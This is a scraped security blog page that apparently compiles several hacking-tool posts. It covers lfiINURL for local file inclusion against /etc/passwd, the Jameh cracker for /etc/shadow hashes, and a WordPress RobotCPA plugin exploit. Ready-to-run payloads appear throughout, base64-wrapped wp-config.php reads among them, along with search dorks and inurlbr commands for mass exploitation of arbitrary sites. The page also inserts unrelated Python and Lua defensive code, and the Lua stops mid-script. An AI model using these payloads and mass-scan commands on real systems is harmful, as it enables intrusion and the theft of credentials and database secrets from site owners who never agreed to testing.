<a href="http://blog.inurl.com.br/2010/08/bd-string-busca-cameras.html">http://blog.inurl.com.br/2010/08/bd-string-busca-cameras.html</a></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=0&ghdb_search_text=webcam" target="_blank">https://www.exploit-db.com/google-hacking-database/?action=search&ghdb_search_cat_id=0&ghdb_search_text=webcam</a></div>
Author: InurlBR (http://www.blogger.com/profile/12688503833321390298)<br />
<br />
<b>Tool lfiINURL - exploring Local File Inclusion</b><br />
Published 2015-07-05, updated 2015-11-19.<div style="text-align: center;">
<span style="font-family: "courier new" , "courier" , monospace; font-size: large;"><b>lfiINURL</b></span></div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Tool Description</b></span><br />
<br />
The script tests increasing directory-traversal depths to find the one at which the server's password file is reached. Example:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggj__seTZGTyMHsud-jy3JpiLgk6jn9sPqTQfj3rj6h5OtrTEigS27eRL3Jm4F5SvywMtP7QIqrKD6z1Okdf2T4KuE2Un8EYNdHSN6rnqHALFIhFACT2cNTcabT20sbQPZy6clTmcFAyU/s1600/hacked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="lfiINURL" border="0" height="237" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEggj__seTZGTyMHsud-jy3JpiLgk6jn9sPqTQfj3rj6h5OtrTEigS27eRL3Jm4F5SvywMtP7QIqrKD6z1Okdf2T4KuE2Un8EYNdHSN6rnqHALFIhFACT2cNTcabT20sbQPZy6clTmcFAyU/s1600/hacked.png" width="400" /></a></div>
<br />
<pre><span style="font-family: "courier new" , "courier" , monospace;">http://target.br/file.php?open=<b>/etc/passwd</b>
http://target.br/file.php?open=<b>../etc/passwd</b>
http://target.br/file.php?open=<b>../../etc/passwd</b>
http://target.br/file.php?open=<b>../../../etc/passwd</b>
http://target.br/file.php?open=<b>../../../../etc/passwd</b></span>
AUTOR: googleINURL
EMAIL: inurlbr@gmail.com
Blog: <a href="http://blog.inurl.com.br/">http://blog.inurl.com.br</a>
Twitter: <a href="https://twitter.com/googleinurl" target="_blank">https://twitter.com/googleinurl</a>
Fanpage: <a href="https://fb.com/InurlBrasil" target="_blank">https://fb.com/InurlBrasil</a>
Pastebin <a href="http://pastebin.com/u/Googleinurl" target="_blank">http://pastebin.com/u/Googleinurl</a>
GIT: <a href="https://github.com/googleinurl" target="_blank">https://github.com/googleinurl</a>
PSS: <a href="http://packetstormsecurity.com/user/googleinurl" target="_blank">http://packetstormsecurity.com/user/googleinurl</a>
YOUTUBE: <a href="http://youtube.com/c/INURLBrasil" target="_blank">http://youtube.com/c/INURLBrasil</a>
PLUS: <a href="http://google.com/+INURLBrasil" target="_blank">http://google.com/+INURLBrasil</a>
</pre>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Vulnerability Description</b></span><br />
<br />
Local File Inclusion (also known as LFI) is the process of including files that are already present locally on the server by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives as input the path of the file to be included and that input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.<br />
<br />
If the conditions above are met, a successful request returns something like the following:<br />
<br />
root:x:0:0:root:/root:/bin/bash<br />
bin:x:1:1:bin:/bin:/sbin/nologin<br />
daemon:x:2:2:daemon:/sbin:/sbin/nologin<br />
alex:x:500:500:alex:/home/alex:/bin/bash<br />
margo:x:501:501::/home/margo:/bin/bash<br />
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">Download tool lfiINURL</span></b><br />
<a href="https://github.com/googleinurl/lfiINURL">https://github.com/googleinurl/lfiINURL</a><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>COMMAND EXPLOIT --help</b></span><br />
<br />
<span style="color: red; font-family: "arial" , "helvetica" , sans-serif;"> <b>-t</b> : SET TARGET.</span><br />
<span style="color: red; font-family: "arial" , "helvetica" , sans-serif;"> <b>-c</b> : COUNT DIR.</span><br />
<span style="color: red; font-family: "arial" , "helvetica" , sans-serif;"> ex: -c 3 = /etc/passwd, ../etc/passwd, ../../etc/passwd ...</span><br />
<b>Execute:</b><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;">php lfiINURL.php <b>-t</b> target.br/index.file?= <b>-c</b> 50</span><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Demonstration execution</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://camo.githubusercontent.com/30deb4425b8f126db77d10d127f0ea7c79bd8441/687474703a2f2f692e696d6775722e636f6d2f346170464d6d5a2e706e67" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Demonstration execution" border="0" height="308" src="https://camo.githubusercontent.com/30deb4425b8f126db77d10d127f0ea7c79bd8441/687474703a2f2f692e696d6775722e636f6d2f346170464d6d5a2e706e67" title="Demonstration execution" width="640" /></a></div>
<br />
<b><span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;">EXAMPLE: MASS EXPLOITATION COMMANDS WITH THE INURLBR SCANNER</span></b><br />
Download scanner inurlbr 1.0<br />
<a href="https://github.com/googleinurl/SCANNER-INURLBR" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR</a><br />
<br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;">inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&index.p=" && <i>php lfiINURL.php <b>-t</b> $URL <b>-c</b> 10</i>'</span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: red; font-family: "courier new" , "courier" , monospace;">inurlbr.php --dork 'include=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&include=" && <i>php lfiINURL.php <b>-t</b> $URL <b>-c</b> 10</i>'</span><br />
<span style="color: red; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: red; font-family: "courier new" , "courier" , monospace;">inurlbr.php --dork 'cn+page=' -s vull.txt -q all --command-all 'URL="_TARGETFULL_&page=" && <i>php lfiINURL.php <b>-t</b> $URL <b>-c</b> 10</i>'</span><br />
<br />
<b># NOTE: USE UNIX</b><br />
<br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>Demonstration execution xpl + inurlbr</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://camo.githubusercontent.com/787928ce51a630e950800d83e375b1479fb22e5f/687474703a2f2f692e696d6775722e636f6d2f37495a744d364a2e6a7067" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Demonstration execution xpl + inurlbr" border="0" height="306" src="https://camo.githubusercontent.com/787928ce51a630e950800d83e375b1479fb22e5f/687474703a2f2f692e696d6775722e636f6d2f37495a744d364a2e6a7067" title="Demonstration execution xpl + inurlbr" width="640" /></a></div>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b><br /></b></span>
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif; font-size: large;"><b>References</b></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">[1] <a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion" target="_blank">https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion</a></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">[2] <a href="http://www.wikipedia.org/wiki/Local_File_Inclusion" target="_blank">http://www.wikipedia.org/wiki/Local_File_Inclusion</a></span><br />
<span style="font-family: "helvetica neue" , "arial" , "helvetica" , sans-serif;">[3] <a href="https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo" target="_blank">https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo</a></span><br />
<br />
Author: InurlBR (http://www.blogger.com/profile/12688503833321390298)<br />
<br />
<b>Jameh - Brute Force Hash passwords /etc/shadow</b><br />
Published 2015-07-03.<h4 style="clear: both; text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><span style="text-align: start;">Jameh - </span>Brute Force</span></h4>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP4Iq4pMn-pumNT9XmrKuG_OX4yGi41yn0smR2m8q_YUO5vMbEetqNmINb68l4Ur1m1LmNaQa0GoYcvqNlmC5cov4Yw7Wd_3dAdhpnkceIw5Gm5vyq3uM1wNIMr8uqSbcl646ZlUG6nEef/s1600/Captura+de+tela+de+2015-07-03+17%253A10%253A10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="Jameh" border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhP4Iq4pMn-pumNT9XmrKuG_OX4yGi41yn0smR2m8q_YUO5vMbEetqNmINb68l4Ur1m1LmNaQa0GoYcvqNlmC5cov4Yw7Wd_3dAdhpnkceIw5Gm5vyq3uM1wNIMr8uqSbcl646ZlUG6nEef/s640/Captura+de+tela+de+2015-07-03+17%253A10%253A10.png" width="640" /></a></div>
<br />
Jameh, properly written and read 'Jame', which in Tupi-Guarani means hidden or mysterious, aims to brute-force the hashed passwords contained in /etc/shadow: given the salt and the hash of a password, it tries to recover the password with a dictionary.<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Creator</b></span><br />
<i>Danilo Vaz - UNK</i><br />
danilovazb@gmail.com<br />
<a href="http://unk-br.blogspot.com/">http://unk-br.blogspot.com</a><br />
<a href="https://twitter.com/unknownantisec">https://twitter.com/unknownantisec</a><br />
<a href="http://github.com/danilovazb">http://github.com/danilovazb</a><br />
<br />
<i>Jameh was inspired by <a href="https://github.com/ricardolongatto/loncrack" target="_blank">loncrack</a>, a tool written in C by Ricardo Longatto to brute-force the password hashes stored in /etc/shadow.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>REQUIREMENTS</b></span><br />
<br />
Import:<br />
threading<br />
time<br />
crypt<br />
argparse<br />
sys<br />
subprocess<br />
<br />
Read &amp; write permission<br />
Root privileges, or membership of the sudoers group<br />
Operating system: Linux<br />
Python 2.7<br />
<br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>INSTALL</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">git clone <a href="http://github.com/danilovazb/jameh">http://github.com/danilovazb/jameh</a></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>HELP</b></span><br />
usage:<br />
<span style="color: red; font-family: Courier New, Courier, monospace;">jameh.py [-h] [-t 10] -f word_list.txt -s '$6$DgAOLzvU' -ha '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>optional arguments:</b></span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -h, --help show this help message and exit</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -t 10, --threads 10</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> Threads</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -f word_list.txt, --file word_list.txt</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> Opens file with passwords</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -s '$6$DgAOLzvU', --salt '$6$DgAOLzvU'</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> Salt, '$6$DgAOLzvU'</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> -ha '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.', --hash '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> hash, '$xw5oqFEZw30SSCdgD9KOiK2BG1J.O135BowUgdsUZB3ErEeZii</span><br />
<span style="color: red; font-family: Courier New, Courier, monospace;"> 6s1vC07BcBoPY06iNcJpxhQYTwzBpjVj7oq.'</span><br />
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>EXAMPLE:</b></span></div>
<div>
<div>
Password: <b>s3nh42015!@#</b></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">~# cat /etc/shadow</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">root:!:16440:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">daemon:*:16273:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">bin:*:16273:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">sys:*:16273:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">sync:*:16273:0:99999:7:::</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">pulse:*:16273:0:99999:7:::</span></div>
<div>
<i><b><span style="font-family: Courier New, Courier, monospace;">danilo:$6$DgAOLzvU$Mt0WllW7AFJt5eFk0HPzjQNes/vvPkHaVmPIaWEb7K64uayPJ3CrEW8gjlBinh9Dzqj4RZXfRAN45XxrpWYjX.:16440:0:99999:7:::</span></b></i></div>
<div>
<br /></div>
<div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>COMMAND:</b></span></div>
<div>
~# python <span style="color: red; font-family: Courier New, Courier, monospace;">jameh.py <b>--file</b> wl.txt <b>--threads</b> 10 <b>--salt</b> '$6$DgAOLzvU' <b>--hash </b>'$Mt0WllW7AFJt5eFk0HPzjQNes/vvPkHaVmPIaWEb7K64uayPJ3CrEW8gjlBinh9Dzqj4RZXfRAN45XxrpWYjX.'</span></div>
</div>
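<br />
As an added example, not part of Jameh or of this post, the following Python parser and audit handles the /etc/shadow format the tool consumes: it splits an entry into scheme id, optional rounds, salt and digest (the pieces Jameh takes as --salt and --hash), converts the last-change day count to a date, and reports the conditions a defender should fix before a copy of the file ever leaks. The sample is the post's excerpt plus two constructed edge-case entries.<br />

```python
from dataclasses import dataclass
from datetime import date, timedelta
from typing import List, Optional

# Constructed sample: the /etc/shadow excerpt from the post plus two entries that are
# not on the page (an explicit rounds= parameter, and a hash kept behind a "!" lock).
SAMPLE_SHADOW = """\
root:!:16440:0:99999:7:::
daemon:*:16273:0:99999:7:::
danilo:$6$DgAOLzvU$Mt0WllW7AFJt5eFk0HPzjQNes/vvPkHaVmPIaWEb7K64uayPJ3CrEW8gjlBinh9Dzqj4RZXfRAN45XxrpWYjX.:16440:0:99999:7:::
legacy:$1$abcdefgh$0123456789abcdefghijkl:16273:0:99999:7:::
locked:!$6$rounds=100000$saltsalt$hashhashhash:16273:0:99999:7:::
"""

# crypt(3) scheme ids: the token between the first two "$" of the password field.
# bcrypt packs cost, salt and digest differently and is only identified here, not split.
CRYPT_IDS = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
             "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt"}
EPOCH = date(1970, 1, 1)


@dataclass
class ShadowEntry:
    user: str
    raw: str                     # password field exactly as stored
    locked: bool                 # "!" or "*" prefix: password login is disabled
    scheme: Optional[str]        # e.g. "6"; None when no crypt-style hash is present
    algorithm: Optional[str]
    rounds: Optional[int]        # explicit rounds= parameter, None means the default
    salt: Optional[str]
    digest: Optional[str]
    last_change: Optional[date]  # field 3, days since 1970-01-01

    @property
    def crypt_salt(self) -> Optional[str]:
        """Salt string as crypt(3) and Jameh's --salt expect it, e.g. '$6$DgAOLzvU'."""
        if self.scheme is None or self.salt is None:
            return None
        rounds = f"rounds={self.rounds}$" if self.rounds is not None else ""
        return f"${self.scheme}${rounds}{self.salt}"


def parse_shadow_line(line: str) -> ShadowEntry:
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError(f"expected 9 colon-separated fields, got {len(fields)}")
    user, pw = fields[0], fields[1]
    locked = pw.startswith(("!", "*"))
    core = pw.lstrip("!")        # `passwd -l` prepends "!" but leaves the hash in place
    scheme = algorithm = rounds = salt = digest = None
    if core.startswith("$"):
        parts = core.split("$")[1:]             # ["6", "DgAOLzvU", "Mt0WllW7..."]
        scheme = parts[0]
        algorithm = CRYPT_IDS.get(scheme, f"unknown(${scheme}$)")
        if len(parts) > 1 and parts[1].startswith("rounds="):
            rounds = int(parts[1][len("rounds="):])
            del parts[1]
        salt = parts[1] if len(parts) > 1 else None
        digest = parts[2] if len(parts) > 2 else None
    elif len(core) == 13:
        algorithm = "descrypt"                  # traditional DES crypt: 13 chars, no "$"
    last_change = EPOCH + timedelta(days=int(fields[2])) if fields[2] else None
    return ShadowEntry(user, pw, locked, scheme, algorithm, rounds, salt, digest, last_change)


def parse_shadow(text: str) -> List[ShadowEntry]:
    return [parse_shadow_line(line) for line in text.splitlines() if line.strip()]


def audit(entries: List[ShadowEntry]) -> List[str]:
    """Findings a defender wants to act on before a copy of the file leaks."""
    findings = []
    for e in entries:
        if e.raw == "":
            findings.append(f"{e.user}: empty password field, login needs no password")
        if e.algorithm in ("md5crypt", "descrypt"):
            findings.append(f"{e.user}: legacy {e.algorithm} hash, very cheap to attack offline")
        if e.algorithm in ("sha256crypt", "sha512crypt") and e.rounds is None:
            findings.append(f"{e.user}: {e.algorithm} at the default 5000 rounds")
        if e.locked and e.digest:
            findings.append(f"{e.user}: locked, but the hash is still stored and attackable")
    return findings


if __name__ == "__main__":
    for entry in parse_shadow(SAMPLE_SHADOW):
        print(entry.user, entry.algorithm, entry.crypt_salt, entry.last_change)
    print(*audit(parse_shadow(SAMPLE_SHADOW)), sep="\n")
```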
<div>
<br /></div>
<div>
<br /></div>
<div>
Ref:</div>
<div>
<a href="http://unk-br.blogspot.com.br/2015/06/jameh-brute-force-em-hash-de-senhas.html" target="_blank">http://unk-br.blogspot.com.br/2015/06/jameh-brute-force-em-hash-de-senhas.html</a></div>
Author: InurlBR (http://www.blogger.com/profile/12688503833321390298)<br />
<br />
<b>WordPress RobotCPA Plugin V5 - Local File Inclusion - MASS EXPLOIT INURLBR</b><br />
Published 2015-06-24.<h3 style="text-align: center;">
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Exploiting the RobotCPA V5 plugin for the WordPress CMS</span></h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwv7ZrZQD6u-OfG-T3c76Q3ILaG5h7oaU9UCHqTD7EMFTlFaSYp0_EMVFPAs55KxnvGJlCC4SqCHIl_Au7n0CqI1HvDbFpYt1t1vgOsDNMx_1T5kYG8sSBGcAdd3CJAkm1GWqhHBV5Vsc/s1600/WordPress-Vulnerability.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="WordPress vulnerability" border="0" height="339" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAwv7ZrZQD6u-OfG-T3c76Q3ILaG5h7oaU9UCHqTD7EMFTlFaSYp0_EMVFPAs55KxnvGJlCC4SqCHIl_Au7n0CqI1HvDbFpYt1t1vgOsDNMx_1T5kYG8sSBGcAdd3CJAkm1GWqhHBV5Vsc/s640/WordPress-Vulnerability.jpg" width="640" /></a></div>
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Exploit Title: Wordpress Plugin RobotCPA V5 - Local File Include</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Exploit Author: <b>T3N38R15</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Vendor Homepage: <a href="http://robot-cpa.good-info.co/">http://robot-cpa.good-info.co/</a></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Version: 5V</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Tested on: Windows (Firefox) / Linux (Firefox)<br />Access: <a href="https://www.exploit-db.com/exploits/37252/">https://www.exploit-db.com/exploits/37252/</a></span><br />
<br />
<i>The affected file is<b><span style="font-family: Courier New, Courier, monospace;"> <span style="color: red;">f.php</span></span></b> and the get-parameter <span style="font-family: Courier New, Courier, monospace;">"<b><span style="color: red;">l</span></b>"</span> is vulnerable to local file inclusion.</i><br />
<i>We just need to <b><span style="color: red;">base64</span></b> encode our injection.</i><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>POC:</b></span><br />
<br />
<b>string exploit: </b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php://filter/resource=./../../../wp-config.php</span><br />
<b>base64: </b><span style="color: red; font-family: Courier New, Courier, monospace;">cGhwOi8vZmlsdGVyL3Jlc291cmNlPS4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==</span><br />
<br />
<b>string exploit: </b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">file:///etc/passwd</span><br />
<b>base64: </b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">ZmlsZTovLy9ldGMvcGFzc3dk</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Example Injection:</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">http://domain.com/wp-content/plugins/robotcpa/f.php?l=</span><b><span style="color: red; font-family: Courier New, Courier, monospace;">{STRING_BASE64_XPL}</span></b><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Mass exploitation with inurlbr</b></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">using GET exploitation parameters and the scanner's internal encoder</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>Example:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;"><b><span style="font-size: large;">--exploit-get</span></b> {you_get}</span><br /><span style="color: red;"><b>--exploit-get</b> "&index.php?id=10'´0x27"</span></span><br />
<br />
<b><span style="color: red; font-family: Courier New, Courier, monospace; font-size: large;">base64</span></b> <span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Encode values in base64.</span><br />
<span style="font-family: Courier New, Courier, monospace;"> Example: <span style="color: red;"><b>base64(</b>{value}<b>)</b></span></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>base64(</b><i>102030</i><b>)</b></span></span><br />
<span style="font-family: Courier New, Courier, monospace;"> Usage: <span style="color: red;"><b>--exploit-get</b> '<i>user?id=</i><b>base64(</b><i>102030</i><b>)</b>'</span></span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Let's use:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="color: red;"><b>--exploit-get</b> </span>"<i><span style="color: yellow;">&l=</span></i><b><span style="color: red;">base64(</span></b><i><span style="color: yellow;">file:///etc/passwd</span></i><b><span style="color: red;">)</span></b>"</span><br />
or<br />
<span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>--exploit-get</b> </span><span style="font-family: 'Courier New', Courier, monospace;">"</span><i style="font-family: 'Courier New', Courier, monospace;"><span style="color: yellow;">&l=</span></i><b style="font-family: 'Courier New', Courier, monospace;"><span style="color: red;">base64(</span></b><span style="color: yellow; font-family: Courier New, Courier, monospace;"><i>php://filter/resource=./../../../wp-config.php</i></span><span style="color: red; font-family: 'Courier New', Courier, monospace;"><b>)</b></span><span style="font-family: 'Courier New', Courier, monospace;">"</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><b>Dork:</b></span><br />
<span style="font-family: Courier New, Courier, monospace;">inurl:"/wp-content/plugins/robotcpa/"</span><br />
<span style="font-family: Courier New, Courier, monospace;">inurl:"plugins/robotcpa/f.php?l="</span><br />
<span style="background-color: white; font-family: Consolas, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace; font-size: 14px; line-height: 15.3999996185303px; white-space: pre;"><br /></span>
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif; font-size: x-large;">Complete command</b><br />
<span style="color: red; font-family: Courier New, Courier, monospace;">php inurlbr.php <b>--dork</b> 'inurl:"plugins/robotcpa/f.php?l="' <b>--exploit-get</b> "&l=<b>base64(</b><i>file:///etc/passwd</i><b>)</b>" <b>-s</b> vuln.txt <b>-q</b> 1,2,3,64</span><br />
<br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><span style="font-size: large;"><b>Internal validation script inurlbr</b></span></span><br />
<br />
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Probing the server for the password file (/etc/passwd)...</span><br />
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">LOCAL FILE INCLUSION</span><br />
<i><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">Local File Inclusion (also known as LFI) is the process of including files that are already locally present on the server, by exploiting vulnerable inclusion procedures implemented in the application.</span></i><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion</a></span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['LOCAL-FILE-INCLUSION-01'] = '/root:/';</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['LOCAL-FILE-INCLUSION-02'] = 'root:x:0:0:';</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['LOCAL-FILE-INCLUSION-03'] = 'mysql:x:';</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><b>If any of these values is found, the script flags the target as vulnerable.</b></span><br />
<span style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">Probing the server for the wp-config.php file...</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">CMS WORDPRESS</span><br />
<i><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;">As the name suggests, if the web application doesn't check the file name requested by the user, any malicious user can exploit this vulnerability to download sensitive files from the server.</span></i><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><i>Arbitrary File Download vulnerability: the wp-config.php file</i></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</a></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><a href="http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure">http://www.acunetix.com/vulnerabilities/web/wordpress-plugin-slider-revolution-arbitrary-file-disclosure</a></span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['CMS-WORDPRESS-01'] = "define('DB_NAME'";</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['CMS-WORDPRESS-02'] = "define('DB_USER'";</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['CMS-WORDPRESS-03'] = "define('DB_PASSWORD'";</span><br />
<span style="font-family: Courier New, Courier, monospace;">$validation['CMS-WORDPRESS-04'] = "define('DB_HOST'";</span><br />
<b style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;">If any of these values is found, the script flags the target as vulnerable.</b><span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif;"><br /></span><br />
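As an added example (not part of this advisory, and not code from inurlbr or from the plugin), the following Lua script shows the defender's side of the pattern described above: it reads web server access log lines, pulls the base64-encoded <b>l</b> parameter out of requests to the plugin's f.php, decodes it the way the vulnerable include would, and flags stream wrappers, path traversal and absolute paths. The log lines are constructed samples and the plugin path is the one from the dork above; the function names are my own.<br />

```lua
-- Added example (not from the advisory or from inurlbr): log-side detection of
-- base64-wrapped LFI payloads aimed at robotcpa/f.php?l=. Runs on stock Lua 5.1-5.4.

local B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
local b64index = {}
for i = 1, #B64 do b64index[B64:sub(i, i)] = i - 1 end

-- Base64 decoder that tolerates missing padding and returns nil on junk input.
local function b64decode(s)
  s = s:gsub("%s", ""):gsub("=+$", "")
  if s == "" or s:find("[^%w%+/]") then return nil end
  local out, bits, nbits = {}, 0, 0
  for i = 1, #s do
    bits = bits * 64 + b64index[s:sub(i, i)]
    nbits = nbits + 6
    if nbits >= 8 then
      nbits = nbits - 8
      out[#out + 1] = string.char(math.floor(bits / 2 ^ nbits) % 256)
      bits = bits % 2 ^ nbits
    end
  end
  return table.concat(out)
end

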